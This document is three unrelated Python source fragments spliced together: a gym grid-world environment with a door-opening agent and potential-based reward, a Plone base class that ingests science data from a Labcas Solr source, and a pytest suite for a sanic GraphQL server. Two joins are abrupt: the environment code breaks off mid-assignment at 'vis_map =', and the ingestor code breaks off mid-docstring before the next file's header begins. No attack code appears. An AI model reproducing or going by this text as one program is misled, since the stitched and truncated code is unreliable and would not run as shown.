if 'sensor' in self.outputs:
self.sensor_dim = 4
# [agent_row, agent_col, agent_theta, door_state]
self.sensor_space = gym.spaces.Box(low=-1.0, high=1.0, shape=(self.sensor_dim,), dtype=np.float32)
observation_space['sensor'] = self.sensor_space
observation_space_min_max['sensor'] = np.array([
[0.0, self.height - 1],
[0.0, self.width - 1],
[-np.pi - EPS, np.pi + EPS],
[self.door_min_state, self.door_max_state],
])
if 'auxiliary_sensor' in self.outputs:
            # [sin(agent_theta), cos(agent_theta), target_row, target_col, door_row, door_col,
            # is_left_room, is_door_front, is_door_front_and_facing_door]
            # (the local-frame entries target_row_local, target_col_local,
            # door_row_local, door_col_local are currently disabled; see the
            # commented-out code below)
self.auxiliary_sensor_dim = 9
self.auxiliary_sensor_space = gym.spaces.Box(low=-1.0, high=1.0, shape=(self.auxiliary_sensor_dim,),
dtype=np.float32)
observation_space['auxiliary_sensor'] = self.auxiliary_sensor_space
observation_space_min_max['auxiliary_sensor'] = np.array([
[-1.0, 1.0],
[-1.0, 1.0],
[0.0, self.height - 1],
[0.0, self.width - 1],
[0.0, self.height - 1],
[0.0, self.width - 1],
[0.0, 1.0],
[0.0, 1.0],
[0.0, 1.0],
# [-(max(self.height, self.width) - 1), max(self.height, self.width) - 1],
# [-(max(self.height, self.width) - 1), max(self.height, self.width) - 1],
# [-(max(self.height, self.width) - 1), max(self.height, self.width) - 1],
# [-(max(self.height, self.width) - 1), max(self.height, self.width) - 1],
])
if 'global_map' in self.outputs:
# 3 channels: channel 1: map
# channel 2: robot position and orientation (1, 2, 3, 4), and goal position (-1)
# channel 3: door state 1-5, 5 = open, 1 = closed
self.global_map_space = gym.spaces.Box(low=-1.0, high=1.0,
shape=(3, self.height, self.width),
dtype=np.float32)
observation_space['global_map'] = self.global_map_space
observation_space_min_max['global_map'] = np.array([
[0.0, 2.0],
[-1.0, self.num_agent_orientation + 1],
[0.0, self.door_max_state],
            ], dtype=float).reshape(3, 2, 1)
if 'local_map' in self.outputs:
# ego centric map, doesn't consider rotation
# 4 channels: channel 1: map
# channel 2: robot position and orientation (1, 2, 3, 4), and goal position (-1)
# channel 3: door state 1-5, 5 = open, 1 = closed
# channel 4: validity map, 1 = this position is within the valid range of global map
self.local_map_space = gym.spaces.Box(low=-1.0, high=1.0,
shape=(4, self.local_map_range, self.local_map_range),
dtype=np.float32)
observation_space['local_map'] = self.local_map_space
observation_space_min_max['local_map'] = np.array([
[0.0, 2.0],
[-1.0, self.num_agent_orientation + 1],
[0.0, self.door_max_state],
[0.0, 1.0],
            ], dtype=float).reshape(4, 2, 1)
self.observation_space = gym.spaces.Dict(observation_space)
self.observation_space_min_max = observation_space_min_max
# traversable tiles for random initialization
self.traversable_tiles_left = np.transpose(np.where(self.map[:, :self.door_col] == 0))
self.traversable_tiles_right = np.transpose(np.where(self.map[:, (self.door_col + 1):] == 0))
# termination and reward
self.max_step = self.config.get('max_step', 500)
self.sparse_reward = self.config.get('sparse_reward', False)
# training-related and visualization
self.should_normalize_observation = should_normalize_observation
self.automatic_reset = automatic_reset
self.visualize = visualize
self.reset_env()
def load_map(self):
self.height = self.config.get('height', 7)
self.width = self.config.get('width', 7)
self.door_row = self.config.get('door_row', 3)
self.door_col = self.config.get('door_col', 3)
self.map = np.zeros((self.height, self.width))
self.map[0, :] = 1
self.map[-1, :] = 1
self.map[:, 0] = 1
self.map[:, -1] = 1 # add walls
self.map[:, self.door_col] = 1 # add door wall
self.map[self.door_row, self.door_col] = 2 # add door
def reset(self):
self.reset_env()
return self.get_observation()
def normalize_observation(self, observation):
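        # Rescale each observation entry to [-1, 1]: subtract the midpoint of its
        # recorded [min, max] range and divide by half of the range width.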
for key in observation:
if len(observation[key].shape) == 1:
assert np.all(observation[key] >= self.observation_space_min_max[key][:, 0]) and \
np.all(observation[key] <= self.observation_space_min_max[key][:, 1]), \
'observation out of bound: {}'.format(key)
obs_mean = np.mean(self.observation_space_min_max[key], axis=1)
obs_mag = (self.observation_space_min_max[key][:, 1] -
self.observation_space_min_max[key][:, 0]) / 2.0
elif len(observation[key].shape) == 3:
assert np.all(observation[key] >= self.observation_space_min_max[key][:, 0:1, :]) and \
np.all(observation[key] <= self.observation_space_min_max[key][:, 1:2, :]), \
'observation out of bound: {}'.format(observation)
obs_mean = np.mean(self.observation_space_min_max[key], axis=1, keepdims=True)
obs_mag = (self.observation_space_min_max[key][:, 1:2, :] -
self.observation_space_min_max[key][:, 0:1, :]) / 2.0
else:
assert False, 'unexpected observation shape'
observation[key] = (observation[key] - obs_mean) / obs_mag
return observation
def wrap_to_pi(self, theta):
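        # map an arbitrary angle into [-pi, pi)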
return theta - np.pi * 2 * np.floor((theta + np.pi) / (np.pi * 2))
def get_global_map(self):
global_map = np.zeros((3, self.height, self.width), dtype=np.float32)
global_map[0] = self.map
global_map[1, self.agent_pos[0], self.agent_pos[1]] = self.agent_orientation + 1
global_map[1, self.target_pos[0], self.target_pos[1]] = -1
global_map[2, self.door_pos[0], self.door_pos[1]] = self.door_state
return global_map
def get_observation(self):
observation = OrderedDict()
if 'sensor' in self.outputs:
sensor = np.zeros(self.sensor_dim, dtype=np.float32)
theta = self.wrap_to_pi(self.agent_orientation * np.pi / 2)
sensor[0:2] = self.agent_pos
sensor[2] = theta
sensor[3] = float(self.door_state)
observation['sensor'] = sensor
if 'auxiliary_sensor' in self.outputs:
auxiliary_sensor = np.zeros(self.auxiliary_sensor_dim, dtype=np.float32)
theta = self.wrap_to_pi(self.agent_orientation * np.pi / 2)
auxiliary_sensor[0] = np.sin(theta)
auxiliary_sensor[1] = np.cos(theta)
auxiliary_sensor[2:4] = self.target_pos
auxiliary_sensor[4:6] = self.door_pos
auxiliary_sensor[6] = float(self.agent_pos[1] < self.door_pos[1])
auxiliary_sensor[7] = float(self.agent_pos[0] == self.door_row
and self.agent_pos[1] == (self.door_col - 1))
auxiliary_sensor[8] = float(self.agent_pos[0] == self.door_row
and self.agent_pos[1] == (self.door_col - 1)
and self.agent_orientation == 0)
# rotation_matrix = np.array([[np.cos(-theta), -np.sin(-theta)], [np.sin(-theta), np.cos(-theta)]])
# auxiliary_sensor[9:11] = rotation_matrix.dot(self.target_pos - self.agent_pos)
# auxiliary_sensor[11:13] = rotation_matrix.dot(self.door_pos - self.agent_pos)
observation['auxiliary_sensor'] = auxiliary_sensor
if 'global_map' in self.outputs:
observation['global_map'] = self.get_global_map()
if 'local_map' in self.outputs:
global_map = self.get_global_map()
local_map = np.zeros((4, self.local_map_range, self.local_map_range), dtype=np.float32)
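            # Clip the egocentric window to the global map bounds; the local_*
            # offsets place the clipped window inside local_map, so cells outside
            # the global map stay zero and the validity channel is 1 only for
            # cells that lie inside the map.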
row_start = max(0, self.agent_pos[0] - self.local_map_range // 2)
row_end = min(self.height, self.agent_pos[0] + self.local_map_range // 2 + 1)
col_start = max(0, self.agent_pos[1] - self.local_map_range // 2)
col_end = min(self.width, self.agent_pos[1] + self.local_map_range // 2 + 1)
local_row_start = row_start - (self.agent_pos[0] - self.local_map_range // 2)
local_row_end = local_row_start + (row_end - row_start)
local_col_start = col_start - (self.agent_pos[1] - self.local_map_range // 2)
local_col_end = local_col_start + (col_end - col_start)
local_map[:3, local_row_start:local_row_end, local_col_start:local_col_end] = \
global_map[:, row_start:row_end, col_start:col_end]
local_map[3, local_row_start:local_row_end, local_col_start:local_col_end] = 1
observation['local_map'] = local_map
if self.should_normalize_observation:
observation = self.normalize_observation(observation)
return observation
def get_l1_dist(self, a, b):
return np.sum(np.abs(a - b))
def get_potential(self):
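        # The potential approximates the remaining work: while in the left room it
        # is the L1 distance to the door, plus the door-opening steps still needed,
        # plus the door-to-target distance; in the right room it is simply the L1
        # distance to the target. get_reward turns decreases of this potential
        # into shaping reward.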
potential = 0.0
# in the left room
if self.agent_pos[1] < self.door_col:
potential += self.get_l1_dist(self.agent_pos, self.door_pos)
potential += self.door_max_state - self.door_state
potential += self.get_l1_dist(self.door_pos, self.target_pos)
# in the right room
else:
potential = self.get_l1_dist(self.agent_pos, self.target_pos)
return potential
def get_reward(self, action):
reward = 0.0
new_normalized_potential = self.get_potential() / self.initial_potential
potential_reward = self.normalized_potential - new_normalized_potential
self.normalized_potential = new_normalized_potential
# new_potential = self.get_potential()
# potential_reward = self.potential - new_potential
# self.potential = new_potential
if not self.sparse_reward:
reward += potential_reward
# slack reward
# reward -= 0.01
reward -= 0.001 * np.sum(action != 0)
if np.array_equal(self.agent_pos, self.target_pos):
success_reward = 10.0
reward += success_reward
return reward
def get_done(self):
done, info = False, {}
if np.array_equal(self.agent_pos, self.target_pos):
done = True
info['success'] = True
elif self.n_step >= self.max_step:
done = True
info['success'] = False
if done:
info['episode_length'] = self.n_step
return done, info
def reset_env(self):
self.agent_pos = self.traversable_tiles_left[np.random.randint(0, len(self.traversable_tiles_left))]
self.agent_orientation = np.random.randint(4)
self.target_pos = self.traversable_tiles_right[np.random.randint(0, len(self.traversable_tiles_right))].copy()
self.target_pos[1] += (self.door_col + 1)
self.door_state = self.door_min_state
self.n_step = 0
self.normalized_potential = 1.0
self.initial_potential = self.get_potential()
# self.potential = self.get_potential()
def simulation_step(self, action):
# locomotion
if action[0] == 1: # turn left
self.agent_orientation = (self.agent_orientation + 1) % self.num_agent_orientation
elif action[0] == 2: # turn right
self.agent_orientation = (self.agent_orientation - 1) % self.num_agent_orientation
elif action[0] == 3: # move forward
next_pos = self.agent_pos + self.direction[self.agent_orientation]
empty_space = self.map[next_pos[0], next_pos[1]] == 0
open_door = self.map[next_pos[0], next_pos[1]] == 2 and self.door_state == self.door_max_state
if empty_space or open_door:
self.agent_pos = next_pos
# manipulation
if action[1] == 1 or action[1] == 2:
next_pos = self.agent_pos + self.direction[self.agent_orientation]
if self.map[next_pos[0], next_pos[1]] == 2: # door
if action[1] == 1:
self.door_state += 1
else:
self.door_state -= 1
self.door_state = np.clip(self.door_state, self.door_min_state, self.door_max_state)
def step(self, action):
self.n_step += 1
if self.visualize:
self.print_observation()
self.simulation_step(action)
if self.visualize:
self.print_action(action)
self.print_observation()
time.sleep(1)
os.system('clear')
observation = self.get_observation()
reward = self.get_reward(action)
done, info = self.get_done()
if done and self.automatic_reset:
info['last_observation'] = observation
observation = self.reset()
return observation, reward, done, info
def print_action(self, action):
action_mapping = [
{
0: 'no op',
1: 'turn left',
2: 'turn right',
3: 'move forward',
},
{
0: 'no op',
1: 'slide up',
2: 'slide down'
}
]
for v, m in zip(action, action_mapping):
print(m[v])
def print_observation(self):
        vis_map =
# Repository: MCLConsortium/jpl.mcl.site.sciencedata
# encoding: utf-8
u'''MCL — Base classes'''
from . import MESSAGE_FACTORY as _
from .interfaces import IIngestor
from ._utils import IngestResults, publish
from .errors import IngestDisabled, RDFTypeMismatchError, TitlePredicateMissing, IngestError
from Acquisition import aq_inner
from five import grok
from plone.supermodel import model
from plone.dexterity.utils import createContentInContainer
from zope import schema
from mysolr import Solr
import rdflib, plone.api, logging
_logger = logging.getLogger(__name__)
DC_ID = 'id'
class IIngestableFolder(model.Schema):
u'''An abstract base class for folders whose content can be created via ingestion from RDF.'''
title = schema.TextLine(
title=_(u'Title'),
description=_(u'The name of this folder.'),
required=True
)
description = schema.Text(
title=_(u'Description'),
description=_(u'A brief description of this folder.'),
required=False
)
labcasurl = schema.URI(
title=_(u'Labcas Solr URL'),
description=_(u'Uniform Resource Locator to the Solr source of labcas data.'),
required=True
)
labcas_sourceurl_prefix = schema.URI(
title=_(u'Labcas URL Prefix'),
description=_(u'Uniform Resource Locator prefix to the full url of the Labcas data page.'),
required=True
)
ingestEnabled = schema.Bool(
title=_(u'Ingest Enabled'),
description=_(u'True if this folder should update its contents during routine ingest.'),
required=False
)
class IngestableFolderView(grok.View):
grok.context(IIngestableFolder)
grok.require('zope2.View')
grok.baseclass()
def isManager(self):
context = aq_inner(self.context)
membership = plone.api.portal.get_tool('portal_membership')
return membership.checkPermission('Manage Portal', context)
def contents(self):
context = aq_inner(self.context)
catalog = plone.api.portal.get_tool('portal_catalog')
return catalog(path={'query': '/'.join(context.getPhysicalPath()), 'depth': 1}, sort_on='sortable_title')
class IScienceDataObject(model.Schema):
u'''An abstract base class for content that are identified by RDF subject URIs.'''
subjectURI = schema.URI(
title=_(u'Subject URI'),
description=_(u"Uniform Resource Identifier that identifies the subject of this object.'"),
required=True,
)
class Ingestor(grok.Adapter):
grok.provides(IIngestor)
grok.context(IIngestableFolder)
def getContainedObjectInterface(self):
u'''Return the interface for objects that should be contained in the
folder that this class adapts.'''
raise NotImplementedError(u'Subclasses must implement getContainedObjectInterface')
def getTitle(self, predicates):
u'''Get the DC title from the given ``predicates``. Subclasses may
override this.'''
return predicates.get(DC_ID)
def _checkPredicates(self, predicates):
u'''Check the given ``predicates`` to see if they make sense for the
kinds of objects we'll be creating. If not, raise an exception. But
if so, return the type's interface, the factory type info, the
predicate map, and the object's title.'''
iface = self.getContainedObjectInterface() # Content type's interface
fti = iface.getTaggedValue('fti') # Factory Type Information
predicateMap = iface.getTaggedValue('predicateMap') # Mapping RDF predicate to content's field name
desiredType = iface.getTaggedValue('typeValue') # RDF type URI that we want
types = predicates.get(iface.getTaggedValue('typeKey')) # ingest type that we're given
title = self.getTitle(predicates) # Get the object's title
if types:
if desiredType in types: # Do we have the right json type?
return iface, fti, predicateMap, unicode(title) # Done!
return None, None, None, None
def _setValue(self, obj, fti, iface, predicate, predicateMap, values):
u'''On the object ``obj`` set the field indicated by ``predicate``
(which we can find via the ``predicateMap``) to the given ``values``.
We can indicate a problem with the named ``fti`` and can access fields
by the given ``iface``.
'''
catalog = plone.api.portal.get_tool('portal_catalog')
fieldName, isRef, urlprefix = predicateMap[unicode(predicate)]
if not values:
_logger.info(
u'For type %s we want predicate %s but not given; leaving %s un-set',
fti, predicate, fieldName
)
return
field = iface.get(fieldName) # Get the field out of the content interface
fieldBinding = field.bind(obj) # Bind that field to the content object
if isRef: # Is this a reference field?
items = [i.getObject() for i in catalog(subjectURI=[urlprefix+s for s in values])] # Find matching objects
if len(items) != len(values): # Find them all?
_logger.info(
u'For type %s predicate %s linked to %d URIs, but only %d found',
fti, predicate, len(values), len(items)
)
if schema.interfaces.ICollection.providedBy(field): # Multi reference?
fieldBinding.set(obj, items) # Yes, set them all
elif len(items) > 0: # Single reference and we have an item?
            fieldBinding.set(obj, items[0])                                        # Set single value
else: # It's a non-reference field
if schema.interfaces.ICollection.providedBy(field): # Is it multi valued?
fieldBinding.validate(values) # Yes, validate all the values
fieldBinding.set(obj, values) # And set all the values
else: # No, it's not multi valued
fieldBinding.validate(values[0]) # Validate just one value
fieldBinding.set(obj, values[0]) # And set just one value
def createObjects(self, context, uris, statements):
u'''Create new objects in the ``context`` identified by ``uris`` and
described in the ``statements``. Return a sequence of those newly
created objects. Subclasses may override this for special ingest
needs.'''
createdObjects = []
# For each subject URI in the RDF
for uri in uris:
# Get the predicates for just that subject
predicates = statements[uri]
try:
# Get the content type's interface, factory type info,
# mapping of predicates to fields, and the title
iface, fti, predicateMap, title = self._checkPredicates(predicates)
if not iface:
continue
except IngestError as ex:
_logger.exception(u'Ingest error on %s: %r; skipping %s', u'/'.join(context.getPhysicalPath()), ex, uri)
continue
# Create a brand new content object
obj = createContentInContainer(context, fti, title=title, subjectURI=unicode(uri))
# Now set its fields
for predicate in predicateMap:
values = predicates.get(predicate) # Get the values
if not values: continue # Skip if empty
if isinstance(values, basestring):
values = [values]
values = [unicode(i) for i in values] # Convert Literal+URIRefs to unicode
try:
self._setValue(obj, fti, iface, predicate, predicateMap, values)
except schema.ValidationError:
_logger.exception(u'Data "%r" for field %s invalid; skipping', values, predicate)
continue
publish(obj)
obj.reindexObject()
createdObjects.append(obj)
return createdObjects
def updateObjects(self, context, uris, brains, statements):
u'''Update those objects in ``context`` that have matching ``uris`` by
using the ``statements`` to determine what needs updating. To quickly
find those objects, there's a lookup table ``brains`` that maps from
subject URI to a portal catalog brain. Subclasses may override this
for special ingest needs.'''
updatedObjects = [] # Start w/no updated objs
for uri in uris: # For each subject URI
brain = brains[uri] # Get matching brain
obj = brain.getObject() # Get matching object
predicates = statements[uri] # Subject-specific preds
objectUpdated = False # Assume no update
iface, fti, predicateMap, title = self._checkPredicates(predicates) # Get usual suspects
for predicate, (fieldName, isRef, urlprefix) in predicateMap.iteritems(): # For each pred+field name
field = iface.get(fieldName) # Get the field
fieldBinding = field.bind(obj) # Bind it to the obj
newValues = predicates.get(rdflib.URIRef(predicate), []) # Get new values
if isinstance(newValues, basestring):
newValues = [newValues]
newValues = [unicode(i) for i in newValues] # Literals to unicodes
if isRef: # Is this a reference?
currentRefs = [i.subjectURI for i in fieldBinding.get(obj)] # Get cur ref'd sub URIs
currentRefs.sort() # Sort 'em
newValues.sort() # Sort the new ones, too
if currentRefs != newValues: # Any change?
self._setValue(obj, fti, iface, predicate, predicateMap, newValues) # Yup, update
objectUpdated = True # We changed
else: # Literal field
currentValues = fieldBinding.get(obj) # Get current values
if schema.interfaces.ICollection.providedBy(field): # Multi-valued field?
if currentValues != newValues: # Values different?
self._setValue(obj, fti, iface, predicate, predicateMap, newValues) # Yep, set new values
objectUpdated = True # We updated the obj
else: # Single-valued field
if currentValues != newValues[0]: # Value different?
self._setValue(obj, fti, iface, predicate, predicateMap, newValues) # Set thew new value
objectUpdated = True # We updated the obj
if objectUpdated: # Did we update the obj?
obj.reindexObject() # Yep, reindex it
updatedObjects.append(obj) # Add it to the list
return updatedObjects # We updated these objs
def ingest(self):
u'''Ingest'''
context = aq_inner(self.context) # Get our container
if not context.ingestEnabled: raise IngestDisabled(context) # Do we ingest?
catalog = plone.api.portal.get_tool('portal_catalog') # Get the catalog
statements = self._readLabcasSolr(context.labcasurl, context.labcas_sourceurl_prefix) # Read the RDF
# Find out what we currently contain
results = catalog(
object_provides=IScienceDataObject.__identifier__,
path=dict(query='/'.join(context.getPhysicalPath()), depth=1)
)
# Make a lookup table from those current brains' subjectURIs to the brains
existingBrains = {}
for i in results:
uri = i['subjectURI'].decode('utf-8')
existingBrains[rdflib.URIRef(uri)] = i
existingURIs = set(existingBrains.keys()) # Set of currently existing URIs in the context
statementURIs = set(statements.keys()) # Set of URIs in the newly read RDF
newURIs = statementURIs - existingURIs # Set of URIs for brand new objects
deadURIs = existingURIs - statementURIs # Set of URIs for objects to delete
updateURIs = statementURIs & existingURIs # Set of URIs for objects that may need to be updated
newObjects = self.createObjects(context, newURIs, statements)
updatedObjects = self.updateObjects(context, updateURIs, existingBrains, statements)
context.manage_delObjects([existingBrains[i]['id'].decode('utf-8') for i in deadURIs])
return IngestResults(newObjects, updatedObjects, deadURIs)
def _readLabcasSolr(self, labcasurl, labcas_sourceurl_prefix):
u'''Read the statements made at the RDF at ``url`` and return a
        dictionary of {s → [{p → [o]}]} where
# Repository: tryagainconcepts/graphql-server
import json
from urllib.parse import urlencode
import pytest
from .app import create_app, url_string
from .schema import AsyncSchema
def response_json(response):
return json.loads(response.body.decode())
def json_dump_kwarg(**kwargs):
return json.dumps(kwargs)
def json_dump_kwarg_list(**kwargs):
return json.dumps([kwargs])
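# json_dump_kwarg serializes kwargs as a single-operation POST body;
# json_dump_kwarg_list wraps the same kwargs in a list, the shape used by
# batched GraphQL requests (see the batch=True tests below).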
@pytest.mark.parametrize("app", [create_app()])
def test_allows_get_with_query_param(app):
_, response = app.client.get(uri=url_string(query="{test}"))
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello World"}}
@pytest.mark.parametrize("app", [create_app()])
def test_allows_get_with_variable_values(app):
_, response = app.client.get(
uri=url_string(
query="query helloWho($who: String){ test(who: $who) }",
variables=json.dumps({"who": "Dolly"}),
)
)
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello Dolly"}}
@pytest.mark.parametrize("app", [create_app()])
def test_allows_get_with_operation_name(app):
_, response = app.client.get(
uri=url_string(
query="""
query helloYou { test(who: "You"), ...shared }
query helloWorld { test(who: "World"), ...shared }
query helloDolly { test(who: "Dolly"), ...shared }
fragment shared on QueryRoot {
shared: test(who: "Everyone")
}
""",
operationName="helloWorld",
)
)
assert response.status == 200
assert response_json(response) == {
"data": {"test": "Hello World", "shared": "Hello Everyone"}
}
@pytest.mark.parametrize("app", [create_app()])
def test_reports_validation_errors(app):
_, response = app.client.get(
uri=url_string(query="{ test, unknownOne, unknownTwo }")
)
assert response.status == 400
assert response_json(response) == {
"errors": [
{
"message": "Cannot query field 'unknownOne' on type 'QueryRoot'.",
"locations": [{"line": 1, "column": 9}],
},
{
"message": "Cannot query field 'unknownTwo' on type 'QueryRoot'.",
"locations": [{"line": 1, "column": 21}],
},
]
}
@pytest.mark.parametrize("app", [create_app()])
def test_errors_when_missing_operation_name(app):
_, response = app.client.get(
uri=url_string(
query="""
query TestQuery { test }
mutation TestMutation { writeTest { test } }
"""
)
)
assert response.status == 400
assert response_json(response) == {
"errors": [
{
"message": "Must provide operation name"
" if query contains multiple operations.",
}
]
}
@pytest.mark.parametrize("app", [create_app()])
def test_errors_when_sending_a_mutation_via_get(app):
_, response = app.client.get(
uri=url_string(
query="""
mutation TestMutation { writeTest { test } }
"""
)
)
assert response.status == 405
assert response_json(response) == {
"errors": [
{
"message": "Can only perform a mutation operation from a POST request.",
}
]
}
@pytest.mark.parametrize("app", [create_app()])
def test_errors_when_selecting_a_mutation_within_a_get(app):
_, response = app.client.get(
uri=url_string(
query="""
query TestQuery { test }
mutation TestMutation { writeTest { test } }
""",
operationName="TestMutation",
)
)
assert response.status == 405
assert response_json(response) == {
"errors": [
{
"message": "Can only perform a mutation operation from a POST request.",
}
]
}
@pytest.mark.parametrize("app", [create_app()])
def test_allows_mutation_to_exist_within_a_get(app):
_, response = app.client.get(
uri=url_string(
query="""
query TestQuery { test }
mutation TestMutation { writeTest { test } }
""",
operationName="TestQuery",
)
)
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello World"}}
@pytest.mark.parametrize("app", [create_app()])
def test_allows_post_with_json_encoding(app):
_, response = app.client.post(
uri=url_string(),
data=json_dump_kwarg(query="{test}"),
headers={"content-type": "application/json"},
)
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello World"}}
@pytest.mark.parametrize("app", [create_app()])
def test_allows_sending_a_mutation_via_post(app):
_, response = app.client.post(
uri=url_string(),
data=json_dump_kwarg(query="mutation TestMutation { writeTest { test } }"),
headers={"content-type": "application/json"},
)
assert response.status == 200
assert response_json(response) == {"data": {"writeTest": {"test": "Hello World"}}}
@pytest.mark.parametrize("app", [create_app()])
def test_allows_post_with_url_encoding(app):
    # An example of how sanic sends data using URL encoding
    # can be found in their repo:
# https://github.com/huge-success/sanic/blob/master/tests/test_requests.py#L927
payload = "query={test}"
_, response = app.client.post(
uri=url_string(),
data=payload,
headers={"content-type": "application/x-www-form-urlencoded"},
)
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello World"}}
@pytest.mark.parametrize("app", [create_app()])
def test_supports_post_json_query_with_string_variables(app):
_, response = app.client.post(
uri=url_string(),
data=json_dump_kwarg(
query="query helloWho($who: String){ test(who: $who) }",
variables=json.dumps({"who": "Dolly"}),
),
headers={"content-type": "application/json"},
)
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello Dolly"}}
@pytest.mark.parametrize("app", [create_app()])
def test_supports_post_json_query_with_json_variables(app):
_, response = app.client.post(
uri=url_string(),
data=json_dump_kwarg(
query="query helloWho($who: String){ test(who: $who) }",
variables={"who": "Dolly"},
),
headers={"content-type": "application/json"},
)
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello Dolly"}}
@pytest.mark.parametrize("app", [create_app()])
def test_supports_post_url_encoded_query_with_string_variables(app):
_, response = app.client.post(
uri=url_string(),
data=urlencode(
dict(
query="query helloWho($who: String){ test(who: $who) }",
variables=json.dumps({"who": "Dolly"}),
)
),
headers={"content-type": "application/x-www-form-urlencoded"},
)
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello Dolly"}}
@pytest.mark.parametrize("app", [create_app()])
def test_supports_post_json_query_with_get_variable_values(app):
_, response = app.client.post(
uri=url_string(variables=json.dumps({"who": "Dolly"})),
data=json_dump_kwarg(
query="query helloWho($who: String){ test(who: $who) }",
),
headers={"content-type": "application/json"},
)
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello Dolly"}}
@pytest.mark.parametrize("app", [create_app()])
def test_post_url_encoded_query_with_get_variable_values(app):
_, response = app.client.post(
uri=url_string(variables=json.dumps({"who": "Dolly"})),
data=urlencode(
dict(
query="query helloWho($who: String){ test(who: $who) }",
)
),
headers={"content-type": "application/x-www-form-urlencoded"},
)
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello Dolly"}}
@pytest.mark.parametrize("app", [create_app()])
def test_supports_post_raw_text_query_with_get_variable_values(app):
_, response = app.client.post(
uri=url_string(variables=json.dumps({"who": "Dolly"})),
data="query helloWho($who: String){ test(who: $who) }",
headers={"content-type": "application/graphql"},
)
assert response.status == 200
assert response_json(response) == {"data": {"test": "Hello Dolly"}}
@pytest.mark.parametrize("app", [create_app()])
def test_allows_post_with_operation_name(app):
_, response = app.client.post(
uri=url_string(),
data=json_dump_kwarg(
query="""
query helloYou { test(who: "You"), ...shared }
query helloWorld { test(who: "World"), ...shared }
query helloDolly { test(who: "Dolly"), ...shared }
fragment shared on QueryRoot {
shared: test(who: "Everyone")
}
""",
operationName="helloWorld",
),
headers={"content-type": "application/json"},
)
assert response.status == 200
assert response_json(response) == {
"data": {"test": "Hello World", "shared": "Hello Everyone"}
}
@pytest.mark.parametrize("app", [create_app()])
def test_allows_post_with_get_operation_name(app):
_, response = app.client.post(
uri=url_string(operationName="helloWorld"),
data="""
query helloYou { test(who: "You"), ...shared }
query helloWorld { test(who: "World"), ...shared }
query helloDolly { test(who: "Dolly"), ...shared }
fragment shared on QueryRoot {
shared: test(who: "Everyone")
}
""",
headers={"content-type": "application/graphql"},
)
assert response.status == 200
assert response_json(response) == {
"data": {"test": "Hello World", "shared": "Hello Everyone"}
}
@pytest.mark.parametrize("app", [create_app(pretty=True)])
def test_supports_pretty_printing(app):
_, response = app.client.get(uri=url_string(query="{test}"))
assert response.body.decode() == (
"{\n" ' "data": {\n' ' "test": "Hello World"\n' " }\n" "}"
)
@pytest.mark.parametrize("app", [create_app(pretty=False)])
def test_not_pretty_by_default(app):
_, response = app.client.get(url_string(query="{test}"))
assert response.body.decode() == '{"data":{"test":"Hello World"}}'
@pytest.mark.parametrize("app", [create_app()])
def test_supports_pretty_printing_by_request(app):
_, response = app.client.get(uri=url_string(query="{test}", pretty="1"))
assert response.body.decode() == (
"{\n" ' "data": {\n' ' "test": "Hello World"\n' " }\n" "}"
)
@pytest.mark.parametrize("app", [create_app()])
def test_handles_field_errors_caught_by_graphql(app):
_, response = app.client.get(uri=url_string(query="{thrower}"))
assert response.status == 200
assert response_json(response) == {
"data": None,
"errors": [
{
"locations": [{"column": 2, "line": 1}],
"message": "Throws!",
"path": ["thrower"],
}
],
}
@pytest.mark.parametrize("app", [create_app()])
def test_handles_syntax_errors_caught_by_graphql(app):
_, response = app.client.get(uri=url_string(query="syntaxerror"))
assert response.status == 400
assert response_json(response) == {
"errors": [
{
"locations": [{"column": 1, "line": 1}],
"message": "Syntax Error: Unexpected Name 'syntaxerror'.",
}
]
}
@pytest.mark.parametrize("app", [create_app()])
def test_handles_errors_caused_by_a_lack_of_query(app):
_, response = app.client.get(uri=url_string())
assert response.status == 400
assert response_json(response) == {
"errors": [{"message": "Must provide query string."}]
}
@pytest.mark.parametrize("app", [create_app()])
def test_handles_batch_correctly_if_is_disabled(app):
_, response = app.client.post(
uri=url_string(), data="[]", headers={"content-type": "application/json"}
)
assert response.status == 400
assert response_json(response) == {
"errors": [
{
"message": "Batch GraphQL requests are not enabled.",
}
]
}
@pytest.mark.parametrize("app", [create_app()])
def test_handles_incomplete_json_bodies(app):
_, response = app.client.post(
uri=url_string(), data='{"query":', headers={"content-type": "application/json"}
)
assert response.status == 400
assert response_json(response) == {
"errors": [{"message": "POST body sent invalid JSON."}]
}
@pytest.mark.parametrize("app", [create_app()])
def test_handles_plain_post_text(app):
_, response = app.client.post(
uri=url_string(variables=json.dumps({"who": "Dolly"})),
data="query helloWho($who: String){ test(who: $who) }",
headers={"content-type": "text/plain"},
)
assert response.status == 400
assert response_json(response) == {
"errors": [{"message": "Must provide query string."}]
}
@pytest.mark.parametrize("app", [create_app()])
def test_handles_poorly_formed_variables(app):
_, response = app.client.get(
uri=url_string(
query="query helloWho($who: String){ test(who: $who) }", variables="who:You"
)
)
assert response.status == 400
assert response_json(response) == {
"errors": [{"message": "Variables are invalid JSON."}]
}
@pytest.mark.parametrize("app", [create_app()])
def test_handles_unsupported_http_methods(app):
_, response = app.client.put(uri=url_string(query="{test}"))
assert response.status == 405
assert response.headers["Allow"] in ["GET, POST", "HEAD, GET, POST, OPTIONS"]
assert response_json(response) == {
"errors": [
{
"message": "GraphQL only supports GET and POST requests.",
}
]
}
@pytest.mark.parametrize("app", [create_app()])
def test_passes_request_into_request_context(app):
_, response = app.client.get(uri=url_string(query="{request}", q="testing"))
assert response.status == 200
assert response_json(response) == {"data": {"request": "testing"}}
@pytest.mark.parametrize("app", [create_app(context={"session": "CUSTOM CONTEXT"})])
def test_passes_custom_context_into_context(app):
_, response = app.client.get(uri=url_string(query="{context { session request }}"))
    assert response.status == 200
res = response_json(response)
assert "data" in res
assert "session" in res["data"]["context"]
assert "request" in res["data"]["context"]
assert "CUSTOM CONTEXT" in res["data"]["context"]["session"]
assert "Request" in res["data"]["context"]["request"]
@pytest.mark.parametrize("app", [create_app(context="CUSTOM CONTEXT")])
def test_context_remapped_if_not_mapping(app):
_, response = app.client.get(uri=url_string(query="{context { session request }}"))
    assert response.status == 200
res = response_json(response)
